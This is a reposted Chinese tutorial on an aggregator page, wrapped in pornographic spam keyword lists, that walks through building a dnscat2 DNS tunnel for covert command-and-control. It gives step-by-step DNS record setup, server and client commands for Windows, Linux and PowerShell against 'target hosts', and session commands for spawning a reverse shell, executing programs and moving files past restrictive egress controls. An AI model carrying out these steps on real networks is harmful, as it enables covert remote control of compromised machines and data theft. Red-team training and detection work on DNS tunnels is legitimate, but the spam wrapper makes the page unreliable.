日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

dnscat2搭建dns隧道

發布時間:2024/6/3 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 dnscat2搭建dns隧道 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
域名購買網站:https://dcc.godaddy.com/ 購買域名,并且注冊網站,應用該模塊 安裝服務端: apt-get install gem apt-get install ruby-dev apt-get install libpq-dev cd dnscat2/server git clone https://github.com/iagox86/dnscat2.git 編譯 bundle install 中繼模式啟動服務端 sudo ruby ./dnscat2.rb vpn.xxx -e open -c 密碼.com --no-cache 被控端連接 windwos:dnscat2-v0.07-client-win32.exe --dns domain=vpn.xxx.xxx --secret xxx.com

目錄

dnscat2

搭建dnscat2隧道步驟

(1):部署域名解析

(2):安裝dnscat2服務端

? (3):在目標主機上安裝dnscat2客戶端

(4):測試客戶端服務端是否連通

中繼模式建立隧道

服務端

客戶端

執行命令


dnscat2

dnscat2是一款開源軟件,使用DNS協議創建加密的C&C通道,通過預共享密鑰進行身份驗證;使用Shell及DNS查詢類型(TXT、MX、CNAME、A、AAAA),多個同時進行的會話類似于SSH中的隧道。dnscat2的客戶端是有Windows版和Linux版,服務端是用Ruby語言編寫的。嚴格的說,dnscat2是一個命令與控制工具。

使用dnscat2隧道的模式有兩種,分別是直連模式和中繼模式。

  • 直連模式:客戶端直接向指定IP地址的DNS服務器發起DNS解析請求
  • 中繼模式:DNS經過互聯網的迭代解析,指向指定的DNS服務器。與直連模式相比,中繼模式的速度較慢

如果目標內網放行所有的DNS請求,dnscat2會使用直連模式,通過UDP的53端口進行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查詢)。在請求日志中,所有的域名都是以 dnscat 開頭的,因此防火墻可以很容易地將直連模式的通信檢測出來。

如果目標內網的請求僅限于白名單服務器或指定的域,dnscat2會使用中繼模式來申請一個域名,并將運行dnscat2服務端的服務器指定為受信任的DNS服務器。

DNS隧道的應用場景如下:在安全策略嚴格的內網環境中,常見的 C&C 通信端口會被眾多安全設備所監控,該網段只允許白名單流量出站,同時其他端口都被屏蔽,傳統的C&C通信無法建立。這種情況下,可以通過使用DNS建立隱蔽隧道來進行通信。

dnscat2通過DNS進行控制并執行命令。與同類工具相比,dnscat2具有如下特點:

  • 支持多個會話
  • 流量加密
  • 使用密鑰防止MiTM攻擊
  • 在內存中直接執行PowerShell腳本
  • 隱蔽通信

搭建dnscat2隧道步驟

(1):部署域名解析

首先,用一臺公網的Linux系統的VPS作為C&C服務器(注意:VPS的53端口一定要開放),并準備好一個可以配置的域名(這里我們假設是hack.com)。然后,去配置域名的記錄。首先創建記錄A,將自己的域名 www.hack.com?解析到VPS服務器地址。然后,創建NS記錄,將 test.hack.com 指向 www.hack.com 。

  • 第一條A類解析是在告訴域名系統,www.hack.com 的IP地址是 xx.xx.xx.xx 。
  • 第二條NS解析是在告訴域名系統,想要知道 test.hack.com 的IP地址,就去問 www.hack.com 。

?

為什么要設置NS類型的記錄呢?因為NS類型的記錄不是用于設置某個域名的DNS服務器的,而是用于設置某個子域名的DNS服務器的。

如何驗證域名解析設置是否成功?
在隨便一臺電腦上ping域名 www.hack.com ,若能ping通,且顯示的IP地址是我們配置的VPS的地址,說明第一條A類解析設置成功并已生效。

然后在我們的VPS上執行以下命令監聽UDP53端口

tcpdump -n -i eth0 udp dst port 53

在任意一臺機器上執行 ?nslookup test.hack.com 命令,如果在我們的VPS監聽的端口有查詢信息,說明第二條記錄設置成功

(2):安裝dnscat2服務端

在VPN服務器上安裝dnscat2服務端。

  • git clone https://github.com/iagox86/dnscat2.git
  • cd dnscat2/server/
  • gem install bundler
  • bundle install
  • ? (3):在目標主機上安裝dnscat2客戶端

    dnscat2客戶端是用C語言編寫的,因此在使用前需要先進行編譯。

    • 如果目標服務器是Windows系統,則可以直接使用編譯好的dnscat2客戶端,或者PowerShell版本的dnscat2(目標機器需要支持PowerShell2.0以上版本)
    • 如果目標服務器是Linux系統,則需要在目標機器上執行如下命令安裝客戶端。

    Linux安裝dnscat2客戶端

  • git clone https://github.com/iagox86/dnscat2.git
  • cd dnscat2/client/
  • make
  • ?

    (4):測試客戶端服務端是否連通

    服務器目前在監聽狀態,執行以下命令測試客戶端能否與服務器進行通信

    dnscat2-v0.07-client-win32.exe --ping test.hack.com

    可以看到,服務器收到了客戶端的請求

    ?

    中繼模式建立隧道

    服務端

    服務端執行以下模式進行監聽

  • ruby ./dnscat2.rb test.hack.com -e open -c root@123456 --no-cache
  • -e:指定安全級別,open表示服務端運行客戶端不進行加密
  • -c:指定密鑰
  • --no-cache:禁止緩存,一定添加該選項,因為powershell-dnscat2客戶端域dnscat2服務端的Caching模式不兼容
  • 客戶端

    客戶端(C語言版本的)執行以下命令,連接服務端

    dnscat2-v0.07-client-win32.exe --dns domain=test.hack.com --secret=root@123456

    如下,客戶端顯示 Session established! ,表示連接成功。?

    客戶端(PowerShell版本)執行以下命令,連接服務端

  • Import-Module .\dnscat2.ps1
  • start-Dnscat2 -Domain test.hack.com --secret=root@123456
  • 客戶端(Linux版本)執行以下命令,連接服務端

  • cd dnscat2/client
  • ./dnscat --dns domain=test.hack.com --secret=root@123456
  • 執行命令

    我們服務端這邊也會顯示New window created:1 ,說明新建了一個session

    然后我們執行下面命令

  • sessions #查看當前建立的session
  • windows #查看當前建立的session,和sessions一樣
  • session -i 1 #進入第一個session,和MSF一樣
  • window -i 1 #進入第一個session,和session -i 1一樣
  • help #查看命令幫助
  • clear:清屏
  • delay:修改遠程響應延時
  • exec :執行遠程機器上的指定程序,例如PowerShell或VBS
  • shell:得到一個反彈的shell
  • download、upload:上傳、下載文件,速度較慢,適合小文件
  • suspend:返回上一層,相當于使用快捷鍵 Ctrl+Z
  • listen:類似于SSH隧道的-L參數(本地轉發)
  • ping:用于確認目標機器是否在線,若返回pong,說明目標機器在線
  • shutdown:切斷當前會話
  • quit:退出dnscat2控制臺
  • kill id:切斷通道
  • set:設置值,例如設置 security=open
  • 我們執行 shell,然后會反彈一個shell過來。接著執行 suspend 返回上一層,sessions查看,可以看到現在有兩個session了。session -i 2進入反彈回來的shell,我們就可以執行CMD命令了

  • shell #得到一個反彈的shell
  • suspend #返回上一層
  • session -i 2 #進入反彈過來的shell
  • 總結

    以上是生活随笔為你收集整理的dnscat2搭建dns隧道的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产欧美久久久精品免费 | 婷婷伊人五月天 | 国产做受麻豆动漫 | 日韩视频免费播放 | 欧美成人看片黄a免费看 | 男男啪啪网站 | 亚洲欧美日韩中文字幕在线观看 | 日韩精品一二三 | 丁香伊人网 | 人禽l交视频在线播放 视频 | 久久精品美女 | 67194成人在线 | 日韩av综合网 | 欧美日韩黄色片 | 欧美极品jizzhd欧美爆 | 97人妻精品一区二区三区免费 | 国产中文字幕三区 | 一级黄色免费网站 | 国产裸体视频网站 | 波多野结衣黄色片 | www色日本| 99热这里只有精品久久 | 夫妻黄色片 | a级片毛片 | 日本女人性视频 | 国产精品久久久久久久久借妻 | 日本最新中文字幕 | 成人国产精品免费 | 久久美女免费视频 | 久久久久久成人精品 | 久久久久久久久久久久 | 99网站| 国产成人精品免高潮在线观看 | 欧美色图亚洲自拍 | 日韩成人精品一区二区三区 | 亚洲第一视频在线 | 中国成熟妇女毛茸茸 | 精品久久久久久久久中文字幕 | 久久国产福利 | zzjizzji亚洲日本少妇 | 日韩亚洲国产欧美 | 五月婷婷狠狠干 | 日日碰日日操 | 国产九九久久 | 欧美永久精品 | 国产精品伦子伦 | 草草视频在线免费观看 | 国产激情网站 | 久久免费视频99 | 综合久久久久久 | 蓝牛av| 精品国产99一区二区乱码综合 | 亚洲偷 | 久久3p | 99热这里只有精品1 亚洲人交配视频 | 久久久久久香蕉 | 国产成人精品一区二区三区 | 亚洲综合激情网 | 99精品视频在线播放免费 | 婷婷色亚洲 | 中文在线免费观看 | 亚洲国产精华液网站w | 女裸全身无奶罩内裤内衣内裤 | 久99| 香蕉福利 | 成人免费毛片男人用品 | 偷拍女澡堂一区二区三区 | 九九影视理伦片 | 亚洲精品视频在线 | 男人与雌性宠物交啪啪 | 成人午夜在线免费观看 | 精品热| 日韩免费在线 | 女人被男人躁得好爽免费视频 | 日本japanese丰满白浆 | 久操福利在线 | 亚洲欧洲av | av男人资源 | 男女啪啪资源 | 精品国产视频在线 | www亚洲精品| 96看片| 欧美一区二区三区激情 | 日韩视频在线观看 | 黑人中文字幕一区二区三区 | 午夜精品国产精品大乳美女 | 欧美在线不卡视频 | 婷婷91 | 97精品人妻一区二区三区 | 国产精品国产三级国产专区51区 | 老汉av| 色婷婷狠狠干 | 精品国产欧美一区二区三区成人 | 国产乱国产 | 日韩美女视频网站 | 美女福利在线观看 | 国产精品久久久久久一区二区 | 一区免费视频 | 欧美日韩制服 |